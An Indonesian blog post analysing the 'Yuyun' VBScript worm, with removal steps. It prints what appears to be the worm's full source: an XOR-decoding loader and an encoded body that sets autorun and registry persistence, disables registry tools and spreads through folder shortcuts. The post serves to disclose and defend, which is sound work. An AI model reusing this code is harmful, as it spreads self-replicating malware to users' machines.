Pages

Subscribe:

Ads 468x60px

Labels

Selasa, 09 Juni 2009

Virus Yuyun.vbs / yuyun.inf / yuyun tumbs.db

Virus ini seperti virus vbscript yang lain,menggunakan compiler bawaan windows yaitu wscript.exe.Virus ini menurut saya cukup ngawur,karena si virus membuat shortcut yang hampir semua nama folder menjadi shortcut.

Selengkapnya virus ini melakukan:

  1. menjalankan script virus dengan autorun.inf , yang kemudian akan menjalankannya secara otomatis waktu windows start up,dengan menulis string run di registry windows.
  2. meng-copy autorun.inf dan script vbs thumb.db yang isinya ‘www.muslimah.or.id;==================================== my name:Yuyun 1.0′ ============================On Error Resume NextDim fso, wsSet fso = CreateObject(”scripting.filesystemobject”)Set ws = CreateObject(”wscript.Shell”)

    Set sh = CreateObject(”Shell.application”)

    Q=WScript.ScriptFullName

    tmp=fso.GetSpecialFolder(2)

    tn=fso.GetTempName

    tmpt=tmp+”\”+tn

    Set swt=WScript.Arguments

    If swt.Count>0 Then

    status=swt(0)

    If status=”auto” Then

    sh.Explore Left(WScript.ScriptFullName,3)

    Else

    status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status

    If fso.FolderExists(status) Then

    sh.Explore status

    Else

    fso.CreateFolder status

    sh.Explore status

    End If

    End If

    Else

    End If

    Set QQ=fso.GetFile(Q)

    Set Q1=QQ.OpenAsTextStream(1,0)

    isiQ=Q1.Read(QQ.Size)

    Q1.close

    t1=InStr(1,isiQ,”Yuyun^_^~!~2008″+” >>>”,0)+18

    isiQ=Right(isiQ,Len(isiQ)-t1)

    hsl=”"

    For v=1 To Len(isiQ)

    t=Asc(Mid(isiQ,v,1))

    hsl=hsl+Chr(t Xor 7)

    Next

    If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0

    Set temporary=fso.OpenTextFile(tmpt,2,True,0)

    temporary.Write hsl

    temporary.Close

    ws.Run “WScript.exe //e:VBScript “+tmpt+” “”"+Q+”"”"

    ‘ Yuyun^_^~!~2008 >>> :::::::::::::::::::::::::::::::::::::::::::::::::::::::

    ‘J~’ifjb’='^r~ri’Qbu’6)7

    ‘N’mrts’pfiif’tbb’bqbu~’`nuk’khhlt’indb+’ebssbu+’lnict’btwbdnfkk~’f'jhtkbj’`nuk

    ‘e~=’Fihi~jhrtb’ni’Mfsnj+’Ihqbjebu’577?

    ‘Pobi’N'ahric’ihsoni`’ebfrs~’bktb)))’fic’sobi’N'puhsb’sont’tdunws’ahu’fkk

    :::::::::::::::::::::::::::::::::::::::::::::::::::::::

    Hi’Buuhu’Ubtrjb’Ibs

    Cnj’ath+’pt+’tsfsrt+tsfsrt6+’ak~

    Tbs’ath’:'DubfsbHembds/%tdunwsni`)ankbt~tsbjhembds%.

    Tbs’pt’:'DubfsbHembds/%ptdunws)Tobkk%.

    Tbs’to’:'DubfsbHembds/%Tobkk)fwwkndfsnhi%.

    Tbs’ibs’:'DubfsbHembds/%ptdunws)ibsphul%.

    ak~:afktb

    sjw:ath)@bsTwbdnfkAhkcbu/5.

    si:ath)@bsSbjwIfjb

    sjws:sjw,%[%,si

    chd:pt)TwbdnfkAhkcbut/%J~Chdrjbist%.

    Tbs'tps:PTdunws)Fu`rjbist

    Na'tps)Dhris97'Sobi

    tsfsrt:tps/7.

    Bic'Na

    na'ath)ankbbntst/sjw,%[^r~ri)V%.'sobi

    tbs'nuf:ath)`bsankb/sjw,%[^r~ri)V%.

    nuf)fssunersbt:7

    nuf)ifjb:%tofknofo)nuf%

    na'nuf)ifjb:%tofknofo)nuf%'sobi

    nuf)ifjb:%^r~ri)V%

    tbs'nuf:ath)hwbisbsankb/sjw,%[^r~ri)V%+5+surb.

    bktb

    ak~:surb

    bic'na

    bktb

    tbs'nuf:ath)hwbisbsankb/sjw,%[^r~ri)V%+5+surb.

    bic'na

    Tbs'FV:ath)@bsAnkb/tsfsrt.

    Na'ath)AnkbBntst/sjws.'Sobi'ath)@bsAnkb/sjws.)Fssunersbt:7

    FV)Dhw~'sjws+Surb

    Tbs'FV:ath)@bsAnkb/sjws.

    FV)Fssunersbt:4>

    fiq:sjw,%[frsh)bb%

    Na'Ihs'ath)AnkbBntst/fiq.'Sobi'FV)Dhw~'fiq

    Tbs'frsh:ath)@bsAnkb/fiq.'

    frsh)fssunersbt:7

    Tbs'frs:ath)HwbiSbsAnkb/fiq+5+Surb+7.

    ntn:%\frshuriZ9hwbi:PTdunws)bb'((b=QETdunws'sorje)ce'frsh9tobkk[hwbi:Hwbi9tobkk[hwbi[Dhjjfic:PTdunws)bb'((b=QETdunws'sorje)ce'frsh9tobkk[hwbi[Cbafrks:69tobkk[bwkhub:Bwkhub9tobkk[bwkhub[Dhjjfic:PTdunws)bb'((b=QETdunws'sorje)ce'frsh%

    ntn:Ubwkfdb/ntn+%9%+qeDuKa.

    frs)Punsb'ntn

    frs)Dkhtb

    frsh)Fssunersbt:4>

    ksld:to)Ifjbtwfdb/!O6d!.)Tbka)wfso','%[Jnduhthas[DC'Eruini`%

    FV)Dhw~'ksld,%[sorje)ce%+Surb

    frsh)Dhw~'ksld,%[frshuri)nia%+Surb

    Na'ath)AnkbBntst/chd,%[cfsfeftb)jce%.'Sobi'ath)@bsAnkb/chd,%[cfsfeftb)jce%.)Fssunersbt:7

    FV)Dhw~'chd,%[cfsfeftb)jce%+Surb

    ub`V

    Tbs'ufuf:RINTLF

    Obus}'Afktb

    Na'Cf~/Ihp.;94'Sobi'ublrutna'chd+6'Bktb'ublrutna'chd+4

    dfkk'fssfdlXibs

    Obus}'Surb

    Tre'ublrutna/wfso+cw.

    Hi'Buuhu'Ubtrjb'Ibs

    cuhwa'wfso

    ptdunws)tkbbw'27

    Na'cw97'Sobi

    Ahu'Bfdo'akcu6'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut

    ublrutna'akcu6)Wfso+'cw*6

    Ibs

    Bic'Na

    Bic'Tre

    Tre'cuhwa/wfso.

    Hi'Buuhu'Ubtrjb'Ibs

    na'cf~/ihp.:6'fic'/jhiso/ihp.jhc'4.:6'sobi'

    ufuf)dhw~'wfso,%[Efdf'FV)usa%

    ufuf)dhw~'wfso,%[J~'ifjb'nt'^r~ri)usa%

    bic'na

    `6:wfso,%[frshuri)nia%

    `5:wfso,%[Sorje)ce%

    Na'ath)AnkbBntst/`6.'Sobi'

    Tbs'`66:ath)@bsAnkb/`6.'

    Na'`66)Fssunersbt;94>'Sobi'

    `66)Fssunersbt:7

    frsh)Dhw~'wfso,%[frshuri)nia%+Surb

    bic'na

    bktb'

    frsh)Dhw~'wfso,%[frshuri)nia%+Surb

    bic'na

    Na'ath)AnkbBntst/`5.'Sobi'

    Tbs'`65:ath)@bsAnkb/`5.

    Na'`65)Fssunersbt;94>'Sobi

    `65)Fssunersbt:7

    FV)Dhw~'wfso,%[Sorje)ce%+Surb

    bic'na

    bktb

    FV)Dhw~'wfso,%[Sorje)ce%+Surb

    Bic'Na

    Na'Ihs'ath)AnkbBntst/wfso,%[Jnduhthas)kil%.'Sobi

    tohu]qinsf’wfso,%[Jnduhthas%+%Jnduhthas%

    cuhw:Fuuf~/%Ibp'Ofuu~'Whssbu'fic)))%+%Ibp'Ahkcbu%+%TrufsV%+%Ufoftnf%+%@fjb%+%]qinsf%+%Chpikhfc%+%CfsfV%+%CfsfV%.

    pp:6

    Ahu’Bfdo’c'Ni’cuhw

    Na’Cf~/ihp.’Jhc’4′:’pp’Sobi’tohu]qinsf’wfso,%[%,c+c

    ptdunws)tkbbw'17

    pp:pp,6

    Ibs

    u:7

    Ahu'Bfdo'akcu'Ni'ath)@bsAhkcbu/wfso,%[%.)TreAhkcbut

    tohu]qinsf’wfso,%[%,akcu)ifjb+akcu)Ifjb

    ptdunws)tkbbw'17

    Na'u94'Sobi'

    Bns'Ahu

    Bic'na

    u:u,6

    Ibs

    Bic'Na

    Bic'Tre

    Tre'tohu]qinsf/wfso+su`s.

    Tbs’tohu:pt)DubfsbTohusdrs/wfso,%)kil%.

    tohu)ndhikhdfsnhi:%tobkk45)ckk+4%

    tohu)sfu`bswfso:%ptdunws)bb%

    tohu)fu`rjbist:%((b=QETdunws’sorje)ce’%%%,su`s,%%%%

    tohu)tfqb

    Bic’Tre

    aridsnhi’fssfdlXibs/.

    Hi’Buuhu’Ubtrjb’Ibs

    buu)dkbfu

    Tbs’hemAhkcbu’:'to)Ifjbtwfdb/!O64!.

    Tbs’dhkNsbjt’:'hemAhkcbu)Nsbjt

    Ahu’Bfdo’tsuAnkbIfjb’ni’hemAhkcbu)Nsbjt

    s:’hemAhkcbu)@bsCbsfnktHa/tsuAnkbIfjb+’63.

    na’ath)ahkcbubntst/s.’sobi

    ublrutna’s+3

    bic’na

    Ibs

    Bic’aridsnhi

    Tre’scu/.

    Hi’Buuhu’Ubtrjb’Ibs

    buu)dkbfu

    PTdunws)Tkbbw’6?7777

    na’buu)irjebu97’sobi’ptdunws)vrns

    Bic’Tre

    aridsnhi’RINTLF/.

    Hi’buuhu’ubtrjb’ibs

    :qeduka

    fcq:%^r~ri’Qbu’6)7′YXY&::::::::::::::::::99Erlfi’cfun’srkfi`’reri’nf’cndnwsf9lfuif’ebuefof~f’jbjenfulfii~f’cfkfj’tfimri`’cfi’wrmf9sfl’mr`f’cfun’srkfi`’lfln9lfuif’intsf’jbjerfsi~f’cnnimfl’cfi’cnwbuercfl9sfwn’cfun’srkfi`’urtrl’ef`nfi’lnun9cblfs’lb’ofsn’risrl’cntf~fi`n9cblfs’lb’sfi`fi’risrl’cnknicri`n99/cnlrsnw’cu=’F`fu’Encfcfun’Dbjerur’Wfcfjr.999%%Mfi`fikfo’lfjr’ebutnlfw’kbjfo+’cfi’mfi`fikfo’/wrkf.’lfjr’ebutbcno’ofsn+’wfcfofk’lfjrkfo9hufi`*hufi`’~fi`’wfkni`’sni“n’/cbufmfsi~f.+’mnlf’lfjr’hufi`*hufi`’~fi`’ebunjfi)%%9/VT)’Fkn’Njufi=64>.999Lfsflfikfo’lbwfcf’hufi`’kfln*kfln’~fi`’ebunjfi=’%%Obicflkfo’jbublf’jbifofi’wficfi`fi~f+’9cfi’jbjbknofuf’lbjfkrfii~f<’~fi`’cbjnlnfi’nsr’fcfkfo’kbeno’trdn’ef`n’jbublf+’9tbtri“roi~f’Fkkfo’Jfof’Jbi`bsforn’fwf’~fi`’jbublf’wbuerfs)%%’/VT)’Fi’Iru=47.99Lfsflfikfo’lbwfcf’pfinsf’~fi`’ebunjfi=’%%Obicflkfo’jbublf’jbifofi’wficfi`fii~f+’9cfi’lbjfkrfii~f+’cfi’mfi`fikfo’jbublf’jbifjwfllfi’wbuonftfii~f+’lbdrfkn’~fi`’9/enftf.’ifjwfl’cfun’wfcfi~f)’Cfi’obicflkfo’jbublf’jbirsrwlfi’lfni’lrcri`’9lbcfcfi~f))))%%’/VT)’Fi’Iru=47.99Thuu~’N'mrts’Insnw’Wunis’sohl))))Icfl’wf5′lofiYXY&”ppp)jrtknjfo)hu)nc’99Ofn’fifl’Fcfj+’tbtri“roi~f’Lfjn’sbkfo’jbirurilfi’lbwfcfjr’9wflfnfi’risrl’jbirsrw’frufsjr’cfi’wflfnfi’nicfo’risrl’wbuonftfi)9Cfi’wflfnfi’sflpf’nsrkfo’~fi`’wfkni`’efnl)’^fi`’cbjnlnfi’nsr’fcfkfo’9tbefof`nfi’cfun’sficf*sficf’lblrftffi’Fkkfo+’jrcfo*jrcfofi’jbublf’tbkfkr’ni`fs)/Fk*F ufa=51.%

    fcq:ubwkfdb/fcq+%9%+.

    tbs’^r5i:ath)hwbisbsankb/sjw,%[q)chd%+5+surb.

    ^r5i)punsb’fcq

    ^r5i)dkhtb

    na’cf~/ihp.:6′fic’/jhiso/ihp.jhc’4.:6’sobi’

    na’ak~:afktb’sobi

    ahu’n:6’sh’4

    pt)uri’%ihsbwfc)bb’(w’%%%,sjw,%[q)chd%%%

    ibs

    bic’na

    bic’na

    tbs’RINTLF:ath)`bsankb/sjw,%[q)chd%.

    bic’aridsnhi

    Tre’ub`V/.

    Hi’Buuhu’Ubtrjb’Ibs

    na’cf~/ihp.:6’sobi

    pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[%+’%^r~riXDfisn%

    pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[CbafrksNdhi[%+%tobkk45)ckk+3?%

    pt)Ub`Punsb’%OLDU[DKTNC[|66666666*5555*4444*3333*222222222222z[TobkkAhkcbu[Fssunersbt%+7+%UB@XCPHUC%

    pt)ub`punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[bwkhubu[Cbtlshw[IfjbTwfdb[|66666666*5555*4444*3333*222222222222z[%+%%

    bic’na

    pt)ub`cbkbsb’%OLDU[kilankb[NtTohusdrs%

    pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Bwkhubu%+%Ptdunws)bb’((b=QETdunws’%%%,chd,%[cfsfeftb)jce%%%

    pt)Ub`Punsb’%OLDR[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~shhkt%+6+%UB@XCPHUC%

    na’kdftb/ath)`bscunqb/%d=%.)AnkbT~tsbj.:%isat%’sobi

    nufV:FV)hwbiftsbstsubfj/6+7.)ubfc/FV)tn}b.

    ppp:ath)@bsTwbdnfkAhkcbu/7.

    tbs’mml:ath)hwbisbsankb/ppp,%[=Jnduhthas’Haandb’Rwcfsb’ahu’Pnichpt’_W)t~t%+5+surb.

    mml)punsb’nufV

    mml)dkhtb

    pt)Ub`Punsb’%OLKJ[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[PniRwcfsb%+%Ptdunws)bb’((b=QETdunws’%%%,ppp,%[=Jnduhthas’Haandb’Rwcfsb’ahu’Pnichpt’_W)t~t%%%

    bic’na

    Bic’Tre

    Tre’Obus}/hhh.

    Hi’Buuhu’Ubtrjb’Ibs

    ch

    Ahu’Bfdo’cuq’Ni’ath)Cunqbt

    Na’cuq)CunqbS~wb:6′Sobi

    ublrutna’cuq)Wfso+3

    Bktb

    ublrutna’cuq)Wfso+5

    Bic’na

    Ibs

    na’ak~:afktb’sobi’

    scu

    bktb’

    ptdunws)vrns

    bic’na

    ub`V

    Na’hhh:Afktb’Sobi’

    Bns’Ch

    Bic’Na

    khhw

    Bic’Tre

    hampir kesemua nama folder yang ada dengan tujuan eksekusi langsung dari wscript.exe
  3. Membuat shortcut dengan nama folder yang ada, ditambah nama microsoft dan new harry potter and… dan new folder yang kesemuanya menuju ke wscript.exe untuk eksekusi file script thumb.db yang sebenarnya script vbs (visual basic script ) yang tersebar di folder-folder.
  4. Membuat system folder di desktop dengan nama yuyun_cantix yang bila diclick kanan hanya ada pilihan buat shortcut,dan tidak ada pilihan hapus.

Cara membersihkannya:

  1. Matikan fungsi Wscript.exe,caranya menggunakan gpedit.msc>administrative templates>System>Double click Don’t run specified Windows applications>enabled>show>tambahkan Wscript.exe dan cscript.exe>ok.Dengan cara ini semua virus vbscript tidak akan tereksekusi.
  2. Gunakan antivirus pcmav bisa download di sini atau anti virus lainnya seperti smadav ver 3 yang telah mendeteksi virus ini sekalian delete shortcutnya bisa down load disini . Sebelumnya endtask wscript.exe yang berjalan di processes task manager. Atau silakan Download di-link yang saya sediakan yaitu di Download Anti Virus dan Update anti Virus yang selalu saya update.
  3. Gunakan search windows , untuk mencari shortcut yang dibuat oleh virus.Cirinya bila shortcut diproperties ditarget akan tertulis “WScript.exe //e:VBScript “+tmpt+” “”"+Q+”.Tapi smadav dan ansav sudah bisa deteksi,scan aja terus hapus.
  4. Gunakan regedit.exe (ketik di menu run) click di my computer-regedit,Click edit>find>ketik yuyun_cantix>click find next.Cara ini digunakan untuk menghilangkan folder system (yuyun_cantix) yang dibuat di desktop.Setelah ketemu lalu delete key sebelah kiri (seperti folder)tenpat yuyun_cantix berada.Dengan begitu folder system yang ada didesktop bisa di delete.
  5. Gunakan msconfig atau tools lain seperti hijack this untuk menghilangkan start up virus.

| Free Bussines? |

Diposting oleh belajar komputer di 01.23
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)